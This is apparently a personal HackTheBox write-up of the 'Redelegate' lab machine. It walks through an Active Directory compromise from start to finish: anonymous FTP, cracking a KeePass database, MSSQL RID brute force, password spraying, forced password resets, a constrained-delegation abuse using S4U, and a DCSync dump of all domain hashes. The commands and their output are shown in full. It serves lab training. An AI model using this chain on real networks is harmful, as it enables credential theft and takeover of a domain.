> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-redelegate.md).

# HTB - Redelegate

## NMAP

```bash
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-31 23:27:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49932/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
59873/tcp open  msrpc         Microsoft Windows RPC
59877/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
59878/tcp open  msrpc         Microsoft Windows RPC
59879/tcp open  msrpc         Microsoft Windows RPC
59884/tcp open  msrpc         Microsoft Windows RPC
59897/tcp open  msrpc         Microsoft Windows RPC
64040/tcp open  msrpc         Microsoft Windows RPC
```

#### Host Enumeration

SMB Anonymous Access but cannot list shares.

No Ldap anonymous bind

No DNS Zone transfer.

### FTP

Anonymous access through FTP successful.

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ ftp 10.129.234.50     
Connected to 10.129.234.50.
220 Microsoft FTP Service
Name (10.129.234.50:ajay): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||64713|)
125 Data connection already open; Transfer starting.
10-20-24  01:11AM                  434 CyberAudit.txt
10-20-24  05:14AM                 2622 Shared.kdbx
10-20-24  01:26AM                  580 TrainingAgenda.txt
226 Transfer complete.
ftp> 
ftp> mget *
mget CyberAudit.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||59506|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************|   434       10.07 KiB/s    00:00 ETA
226 Transfer complete.
434 bytes received in 00:00 (9.93 KiB/s)
mget Shared.kdbx [anpqy?]? y
229 Entering Extended Passive Mode (|||59507|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************|  2622       52.61 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 10 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
2622 bytes received in 00:00 (52.16 KiB/s)
mget TrainingAgenda.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||59508|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************|   580       13.57 KiB/s    00:00 ETA
226 Transfer complete.
580 bytes received in 00:00 (13.41 KiB/s)
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiXaMyevXrZMGTO2Lse3O%2Fimage.png?alt=media&amp;token=b65a2d33-c491-4e5b-95ab-21f0336f61b9" alt=""><figcaption></figcaption></figure>

Found a weak password in the documents downloaded from FTP server `SeasonYear!` . Also the documents talk about Audit findings that the system may have and indicates that there are unused objects in the domain and also misconfigured ACLS and also found a KeePass Password Manager database.

Since the training took place in October 2024, the classic corporate pattern users fall back on when forced to change their weak passwords is the current season and year.

I have built customized list of variations to try:

```
Autumn2024!
Autumn24!
Fall2024!
Fall24!
October2024!
October24!
Summer2024!
Summer24!
Winter2024!
Winter24!
```

```wasm

┌──(ajay㉿kali)-[~]
└─$ keepass2john Shared.kdbx > keepass.hash

──(ajay㉿kali)-[~]
└─$ john --wordlist=pass.txt keepass.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Fall2024!        (Shared)     
1g 0:00:00:01 DONE (2026-05-31 20:12) 0.8474g/s 8.474p/s 8.474c/s 8.474C/s Autumn2024!..Winter24!
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

Found the password but i have tried the standard rockyou and other wordlist too but taking a long time so used customized pass.txt file based on the hints provided in the documents downloded form ftp server.

Now using the creds i have enumerated the database.

```bash
──(ajay㉿kali)-[~]
└─$ kpcli --kdb=Shared.kdbx                
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
Shared/
kpcli:/> cd Shared
kpcli:/Shared> ls
=== Groups ===
Finance/
HelpDesk/
IT/
kpcli:/Shared> ls
=== Groups ===
Finance/
HelpDesk/
IT/
kpcli:/Shared> tree
tree: unknown command
kpcli:/Shared> cd Finance/
kpcli:/Shared/Finance> ls
=== Entries ===
0. Payrol App                                                             
1. Timesheet Manager                                                      
kpcli:/Shared/Finance> cd ..
kpcli:/Shared> cd HelpDesk/
kpcli:/Shared/HelpDesk> ls
=== Entries ===
0. KeyFob Combination                                                     
kpcli:/Shared/HelpDesk> cd ..
kpcli:/Shared> ls
=== Groups ===
Finance/
HelpDesk/
IT/
kpcli:/Shared> cd IT
kpcli:/Shared/IT> ls
=== Entries ===
0. FS01 Admin                                                             
1. FTP                                                                    
2. SQL Guest Access                                                       
3. WEB01                                                                  
kpcli:/Shared/IT> 
```

```bash
Title: FS01 Admin
Uname: Administrator
 Pass: Spdv41gg4BlBgSYIW1gF

Title: FTP
Uname: FTPUser
 Pass: SguPZBKdRyxWzvXRWy6U

Title: WEB01
Uname: WordPress Panel
 Pass: cn4KOEgsHqvKXPjEnSD9

Uname: SQLGuest
 Pass: zDPBpaF4FywlqIv11vii

Title: Payrol App
Uname: Payroll
 Pass: cVkqz4bCM7kJRSNlgx2G

Title: Timesheet Manager
Uname: Timesheet
 Pass: hMFS4I0Kj8Rcd62vqi5X

Title: KeyFob Combination
Uname: 
 Pass: 22331144
```

Found the above creds in the keepassdatabase

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc mssql 10.129.234.50 -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth
MSSQL       10.129.234.50   1433   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (EncryptionReq:False)
MSSQL       10.129.234.50   1433   DC               [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii 
```

est of the creds did not work but using a —local-auth flag gave a successful hit for mssql creds.

I have run the creds aganist mssql beacuse the tagret has mssql running on it which can be confirmed by looking at the nmap results.

### MSSQL

```sql
──(ajay㉿kali)-[~]
└─$ impacket-mssqlclient SQLGuest:zDPBpaF4FywlqIv11vii@10.129.234.50
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (SQLGuest  guest@master)> 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5TMJWVaBpurBlurVNqs5%2Fimage.png?alt=media&amp;token=fd1ab4c2-6062-4670-89bc-b493b7ac5781" alt=""><figcaption></figcaption></figure>

first thing i have checked is if we can run enable xp\_cmshell because having that privilege can get us an RCE. but we dont have it.

No interesting databases found too.

Manual enumeration did not lead me any where so i turned to hacktricks for help.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaYclU2k1zMcPSD1PDE2w%2Fimage.png?alt=media&amp;token=be653351-4917-4cd9-8b63-36e17a27d9b4" alt=""><figcaption></figcaption></figure>

{% embed url="<https://hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html>" %}

#### Metasploit to enumerate

```bash
┌──(ajay㉿kali)-[~]
└─$ msfconsole -q                                                  
msf > use admin/mssql/mssql_enum_domain_accounts
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set PASSWORD zDPBpaF4FywlqIv11vii
PASSWORD => zDPBpaF4FywlqIv11vii
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set USERNAME SQLGuest
USERNAME => SQLGuest
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set RHOSTS 10.129.234.50
RHOSTS => 10.129.234.50
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > 
```

```bash
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.129.234.50
[*] 10.129.234.50:1433 - Attempting to connect to the database server at 10.129.234.50:1433 as SQLGuest...
[+] 10.129.234.50:1433 - Connected.
[*] 10.129.234.50:1433 - SQL Server Name: WIN-Q13O908QBPG
[*] 10.129.234.50:1433 - Domain Name: REDELEGATE
[+] 10.129.234.50:1433 - Found the domain sid: 010500000000000515000000a185deefb22433798d8e847a
[*] 10.129.234.50:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.129.234.50:1433 -  - WIN-Q13O908QBPG\Administrator
[*] 10.129.234.50:1433 -  - REDELEGATE\Guest
[*] 10.129.234.50:1433 -  - REDELEGATE\krbtgt
[*] 10.129.234.50:1433 -  - REDELEGATE\Domain Admins
[*] 10.129.234.50:1433 -  - REDELEGATE\Domain Users
[*] 10.129.234.50:1433 -  - REDELEGATE\Domain Guests
[*] 10.129.234.50:1433 -  - REDELEGATE\Domain Computers
[*] 10.129.234.50:1433 -  - REDELEGATE\Domain Controllers
[*] 10.129.234.50:1433 -  - REDELEGATE\Cert Publishers
[*] 10.129.234.50:1433 -  - REDELEGATE\Schema Admins
[*] 10.129.234.50:1433 -  - REDELEGATE\Enterprise Admins
[*] 10.129.234.50:1433 -  - REDELEGATE\Group Policy Creator Owners
[*] 10.129.234.50:1433 -  - REDELEGATE\Read-only Domain Controllers
[*] 10.129.234.50:1433 -  - REDELEGATE\Cloneable Domain Controllers
[*] 10.129.234.50:1433 -  - REDELEGATE\Protected Users
[*] 10.129.234.50:1433 -  - REDELEGATE\Key Admins
[*] 10.129.234.50:1433 -  - REDELEGATE\Enterprise Key Admins
[*] 10.129.234.50:1433 -  - REDELEGATE\RAS and IAS Servers
[*] 10.129.234.50:1433 -  - REDELEGATE\Allowed RODC Password Replication Group
[*] 10.129.234.50:1433 -  - REDELEGATE\Denied RODC Password Replication Group
[*] 10.129.234.50:1433 -  - REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
[*] 10.129.234.50:1433 -  - REDELEGATE\DC$
[*] 10.129.234.50:1433 -  - REDELEGATE\FS01$
[*] 10.129.234.50:1433 -  - REDELEGATE\Christine.Flanders
[*] 10.129.234.50:1433 -  - REDELEGATE\Marie.Curie
[*] 10.129.234.50:1433 -  - REDELEGATE\Helen.Frost
[*] 10.129.234.50:1433 -  - REDELEGATE\Michael.Pontiac
[*] 10.129.234.50:1433 -  - REDELEGATE\Mallory.Roberts
[*] 10.129.234.50:1433 -  - REDELEGATE\James.Dinkleberg
[*] 10.129.234.50:1433 -  - REDELEGATE\Helpdesk
[*] 10.129.234.50:1433 -  - REDELEGATE\IT
[*] 10.129.234.50:1433 -  - REDELEGATE\Finance
[*] 10.129.234.50:1433 -  - REDELEGATE\DnsAdmins
[*] 10.129.234.50:1433 -  - REDELEGATE\DnsUpdateProxy
[*] 10.129.234.50:1433 -  - REDELEGATE\Ryan.Cooper
[*] 10.129.234.50:1433 -  - REDELEGATE\sql_svc
```

Found users through the metasploit module by bruteforcing RID’s.Next i copied them to a file and use awk to filter the noise and copy username to the file.

```bash
──(ajay㉿kali)-[~]
└─$ awk -F'\\' '{print $2}' users.txt | sort > use.txt
```

and manually removed the groups in the file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlotD0WN19gNJWi1izuVx%2Fimage.png?alt=media&amp;token=c783136a-a543-4e52-b233-76cb59619c2d" alt=""><figcaption></figcaption></figure>

Using the usernames i have tried to check for Asreproast but no luck there.

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-GetNPUsers redelegate.vl/ -usersfile use.txt -dc-ip 10.129.234.50 -no-pass 
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[-] User Christine.Flanders doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Helen.Frost doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User James.Dinkleberg doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Mallory.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Marie.Curie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Michael.Pontiac doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ryan.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
```

So instead i used Netexec to run a password spray using all the passwords i have and found a valid cred for user Marie.Curie

```wasm
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.234.50 -u use.txt -p pass.txt             
SMB         10.129.234.50   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
<SNIP>
SMB         10.129.234.50   445    DC               [+] redelegate.vl\Marie.Curie:Fall2024!
```

### Bloodhound loot as Marie.Curie

Marie does not have winrm privileges so i tried to collect data as marie.curie to get more clear picture of the domain.

```bash
┌──(ajay㉿kali)-[~]
└─$ bloodhound-python -u Marie.Curie -p 'Fall2024!' -d redelegate.vl -dc DC.redelegate.vl -ns 10.129.234.50 -c All --zip
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F62uj2MORjEb7559hBsYx%2Fimage.png?alt=media&amp;token=d01502a6-e84e-4dc8-844b-abcf69b66d2d" alt=""><figcaption></figcaption></figure>

Marie.curie has 6 Outbound object control on the above users which we can utilize to exploit further.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfecqUKMQf808tGHx3pSF%2Fimage.png?alt=media&amp;token=2435f2b1-59b2-4a1a-aff4-709a0fd44972" alt=""><figcaption></figcaption></figure>

Searching for shortest paths to domain admins from owned objects gives us the clear path to continue the exploitation further.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTqE8MKaDlsxOfq0fb4wn%2Fimage.png?alt=media&amp;token=2e611043-2e31-4ca6-9c00-ec91de618594" alt=""><figcaption></figcaption></figure>

## Marie.Curie

Marie curie is part of Helpdesk group which has ForceChangePassword on HELEN.FROST

### Abusing ForceChangePassword

```wasm
┌──(ajay㉿kali)-[~]
└─$ net rpc password "Helen.Frost" 'Password@123!' -U 'redelegate.vl/Marie.Curie%Fall2024!' -S 10.129.234.50 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.234.50 -u Helen.Frost -p 'Password@123!'                                                 
SMB         10.129.234.50   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.50   445    DC               [+] redelegate.vl\Helen.Frost:Password@123!
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fe9t4Q9MQBD3Ii9M14zZt%2Fimage.png?alt=media&amp;token=6bb3ee5d-4a05-403e-a0ed-ce0292e6a97d" alt=""><figcaption></figcaption></figure>

After successfully changed the password fro Helen, i have marked it as owned and checked for its privileges on bloodhound which revealed Helen.Frost is member of Remote Management Users so we can Use winrm to get a remote access.

## Shell as Helen.Frost

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiSeYudvZWuDOkJm6URtR%2Fimage.png?alt=media&amp;token=f983d90d-f56f-427c-8405-64d99b6d7378" alt=""><figcaption></figcaption></figure>

```powershell
*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> ls


    Directory: C:\Users\Helen.Frost\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         5/31/2026   4:13 PM             34 user.txt
```

Next, looking at  the outbound object control of helen.frost showed that she is part of IT group which has GenericAll on `FS01.REDELEGATE.VL.`&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4Pnbb2ynf0jug2UD426W%2Fimage.png?alt=media&amp;token=79d32195-1693-4d3f-b67c-5e882c616273" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGBpTvl96xrRzAL8Bh3OY%2Fimage.png?alt=media&amp;token=62b5596c-0519-4fa3-99c9-a15d32c674a3" alt=""><figcaption></figcaption></figure>

Helen has Delegation privileges.

### Resource Based Constrained Delegation

**`GenericAll`** means full object control. You can modify any attribute on the `FS01` computer account, which makes it highly vulnerable to a **Resource-Based Constrained Delegation (RBCD)** attack or a computer object password reset.

Because the `IT` group (Helen) has full control over `FS01`, you can configure `FS01` to trust a fake computer account that *you* control, allowing you to impersonate any domain user (like the local Administrator) to it.

#### Create a New Fake Computer Account (MachineAccountQuota)

```bash
──(ajay㉿kali)-[~]
└─$ impacket-addcomputer redelegate.vl/Helen.Frost:'Password@123!' -dc-ip 10.129.234.50 -computer-name 'ATTACK_DC$' -computer-pass 'Password@123!'    
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[-] Authenticating account's machine account quota exceeded!
```

The MachineAccountQuota exceeded! error means that the domain has its MachineAccountQuota (MAQ) attribute set to 0. By default, Active Directory allows regular users to join up to 10 machine accounts to the domain, but administrators lock this down to 0 in secure environments to prevent exactly what we are trying to do.

Since we cannot create a new computer account, we have to look for another way to abuse that GenericAll permission over FS01.

\
So unconstrained delegation doesnt work.

#### Constrained Delegation

I can use BloodyAD to force a password reset on FA01$ computer account machine password.

**Step 1: Force reset password.**

```bash
┌──(ajay㉿kali)-[~]
└─$ bloodyAD -d redelegate.vl -u Helen.Frost -p 'Password@123!' --host 10.129.234.50 set password 'FS01$' 'Pass@123!'        
[+] Password changed successfully!
```

Now that you own FS01$ and know its password , you don't need a fake computer account anymore. You can make FS01$ trust itself for delegation, or use it to write the delegation property directly.

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.234.50 -u 'FS01$' -p 'Pass@123!' -d 'redelegate.vl'
SMB         10.129.234.50   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.50   445    DC               [+] redelegate.vl\FS01$:Pass@123!
```

With nxc confirms the password change for FS01$ it says the hostname is DC but not FS01$ this confirms that FS01 is not the computer it looks like or hosted on another ip.

**Step 2: Configure Constrained Delegation with Protocol Transition**

Inside the WinRM session as Helen.Frost, configured two critical AD attributes on FS01$:

```powershell
# Allow FS01$ to impersonate any user without needing their password
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True

# Tell the KDC that FS01$ is allowed to delegate to the DC's CIFS/LDAP service
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Set-ADObject -Identity "CN=FS01,CN=Computers,DC=REDELEGATE,DC=VL" -Add @{"msDS-AllowedToDelegateTo" = "ldap/dc.redelegate.vl"}
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Get-ADComputer FS01$ -Properties TrustedToAuthForDelegation,msDS-AllowedToDelegateTo | Select TrustedToAuthForDelegation,msDS-AllowedToDelegateTo

TrustedToAuthForDelegation msDS-AllowedToDelegateTo
-------------------------- ------------------------
                      True {cifs/DC.redelegate.vl, ldap/DC.redelegate.vl}
```

**Why `TrustedToAuthForDelegation`:** This enables **Protocol Transition (S4U2Self)** — it allows `FS01$` to obtain a service ticket on behalf of ANY user, even without that user's credentials. Without this flag, the S4U2self ticket won't be forwardable and S4U2Proxy will fail.

**Why `msDS-AllowedToDelegateTo`:** This is **Constrained Delegation** — it restricts which services `FS01$` can delegate to. Setting it to `cifs/DC` and `ldap/DC` tells the KDC that `FS01$` is trusted to act on behalf of users specifically for those services on the DC.

**Step 3: Request a Forwardable TGT for FS01$**

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-getTGT 'redelegate.vl/FS01$:Pass@123!' -dc-ip 10.129.234.50
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in FS01$.ccache
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=FS01\$.ccache                            
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ klist   
Ticket cache: FILE:FS01$.ccache
Default principal: FS01$@REDELEGATE.VL

Valid starting       Expires              Service principal
06/01/2026 00:54:51  06/01/2026 10:54:51  krbtgt/REDELEGATE.VL@REDELEGATE.VL
        renew until 06/02/2026 00:54:50
```

By explicitly requesting a TGT first, you ensure it is forwardable. When impacket requests a TGT internally, it may not be forwardable, causing S4U2Proxy to fail.

**Step 4: Get Service Ticket as DC$**

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-getST -spn 'cifs/DC.redelegate.vl' -impersonate dc 'redelegate.vl/FS01$:Pass@123!' -dc-ip 10.129.234.50
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@cifs_DC.redelegate.vl@REDELEGATE.VL.ccache
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=dc@cifs_DC.redelegate.vl@REDELEGATE.VL.ccache
```

**Step 5 : DCSync — Dump All Domain Hashes**

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-secretsdump -k -no-pass DC.redelegate.vl -dc-ip 10.129.234.50
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec17f7a2a4d96e177bfd101b94ffc0a7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
Helen.Frost:1106:aad3b435b51404eeaad3b435b51404ee:539259e25a0361ec4a227dd9894719f6:::
Michael.Pontiac:1107:aad3b435b51404eeaad3b435b51404ee:f37d004253f5f7525ef9840b43e5dad2:::
Mallory.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:980634f9aabfe13aec0111f64bda50c9:::
James.Dinkleberg:1109:aad3b435b51404eeaad3b435b51404ee:2716d39cc76e785bd445ca353714854d:::
Ryan.Cooper:1117:aad3b435b51404eeaad3b435b51404ee:062a12325a99a9da55f5070bf9c6fd2a:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:76a96946d9b465ec76a4b0b316785d6b:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:bfdff77d74764b0d4f940b7e9f684a61:::
FS01$:1103:aad3b435b51404eeaad3b435b51404ee:e9ec51b7fcd09778ac79d407d5c719c8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:db3a850aa5ede4cfacb57490d9b789b1ca0802ae11e09db5f117c1a8d1ccd173
Administrator:aes128-cts-hmac-sha1-96:b4fb863396f4c7a91c49ba0c0637a3ac
Administrator:des-cbc-md5:102f86737c3e9b2f
krbtgt:aes256-cts-hmac-sha1-96:bff2ae7dfc202b4e7141a440c00b91308c45ea918b123d7e97cba1d712e6a435
krbtgt:aes128-cts-hmac-sha1-96:9690508b681c1ec11e6d772c7806bc71
krbtgt:des-cbc-md5:b3ce46a1fe86cb6b
Christine.Flanders:aes256-cts-hmac-sha1-96:ceb5854b48f9b203b4aa9a8e0ac4af28b9dc49274d54e9f9a801902ea73f17ba
Christine.Flanders:aes128-cts-hmac-sha1-96:e0fa68a3060b9543d04a6f84462829d9
Christine.Flanders:des-cbc-md5:8980267623df2637
Marie.Curie:aes256-cts-hmac-sha1-96:616e01b81238b801b99c284e7ebcc3d2d739046fca840634428f83c2eb18dbe8
Marie.Curie:aes128-cts-hmac-sha1-96:daa48c455d1bd700530a308fb4020289
Marie.Curie:des-cbc-md5:256889c8bf678910
Helen.Frost:aes256-cts-hmac-sha1-96:49a19dd3e3c11260303bb0c09cb5630fd18e186180d9101ee59e0656e8e6eaae
Helen.Frost:aes128-cts-hmac-sha1-96:c9c4480ceee6cea21274aa8d645c4f7f
Helen.Frost:des-cbc-md5:8a46cbea700d61fe
Michael.Pontiac:aes256-cts-hmac-sha1-96:eca3a512ed24bb1c37cd2886ec933544b0d3cfa900e92b96d056632a6920d050
Michael.Pontiac:aes128-cts-hmac-sha1-96:53456b952411ac9f2f3e2adf433ab443
Michael.Pontiac:des-cbc-md5:833dc82fab76c229
Mallory.Roberts:aes256-cts-hmac-sha1-96:c9ad270adea8746d753e881692e9a75b2487a6402e02c0c915eb8ac6c2c7ab6a
Mallory.Roberts:aes128-cts-hmac-sha1-96:40f22695256d0c49089f7eda2d0d1266
Mallory.Roberts:des-cbc-md5:cb25a726ae198686
James.Dinkleberg:aes256-cts-hmac-sha1-96:c6cade4bc132681117d47dd422dadc66285677aac3e65b3519809447e119458b
James.Dinkleberg:aes128-cts-hmac-sha1-96:35b2ea5440889148eafb6bed06eea4c1
James.Dinkleberg:des-cbc-md5:83ef38dc8cd90da2
Ryan.Cooper:aes256-cts-hmac-sha1-96:d94424fd2a046689ef7ce295cf562dce516c81697d2caf8d03569cd02f753b5f
Ryan.Cooper:aes128-cts-hmac-sha1-96:48ea408634f503e90ffb404031dc6c98
Ryan.Cooper:des-cbc-md5:5b19084a8f640e75
sql_svc:aes256-cts-hmac-sha1-96:1decdb85de78f1ed266480b2f349615aad51e4dc866816f6ac61fa67be5bb598
sql_svc:aes128-cts-hmac-sha1-96:88f45d60fa053d62160e8ea8f1d0231e
sql_svc:des-cbc-md5:970d6115d3f4a43b
DC$:aes256-cts-hmac-sha1-96:0e50c0a6146a62e4473b0a18df2ba4875076037ca1c33503eb0c7218576bb22b
DC$:aes128-cts-hmac-sha1-96:7695e6b660218de8d911840d42e1a498
DC$:des-cbc-md5:3db913751c434f61
FS01$:aes256-cts-hmac-sha1-96:8bcacd448e42f738265b33c64691373f12fe29d953ebfebe24e6d53186e34c3c
FS01$:aes128-cts-hmac-sha1-96:90db19ad91510bcd60c74700835d1021
FS01$:des-cbc-md5:7c704f58c89d4586
[*] Cleaning up... 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ 

```

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FuH0qveV6EuHdEVdjjC47%2Fimage.png?alt=media&amp;token=d08fb8cd-98f8-4560-9a90-4e3d72ae65b0" alt=""><figcaption></figcaption></figure>


---

